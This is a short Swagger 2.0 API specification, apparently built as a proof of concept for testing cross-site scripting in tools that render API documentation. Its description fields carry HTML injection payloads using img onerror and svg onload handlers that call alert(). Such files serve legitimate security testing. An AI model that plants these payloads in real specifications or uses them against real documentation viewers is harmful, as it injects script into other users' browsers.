swagger: "2.0"
info:
  title: XSS PoC Swagger Spec
  description: |
    <img src=x onerror=alert('XSS in info.description')>
  version: "1.0"

basePath: /
produces:
  - application/json
consumes:
  - application/json

paths:
  /xss-test:
    get:
      summary: Try to trigger XSS from parameter description
      description: Try to trigger XSS from this endpoint
      parameters:
        - name: input
          in: query
          description: |
            <svg/onload=alert('XSS in parameter.description')>
          required: false
          type: string
      responses:
        "200":
          description: |
            <img src=1 onerror=alert('XSS in response.description')>
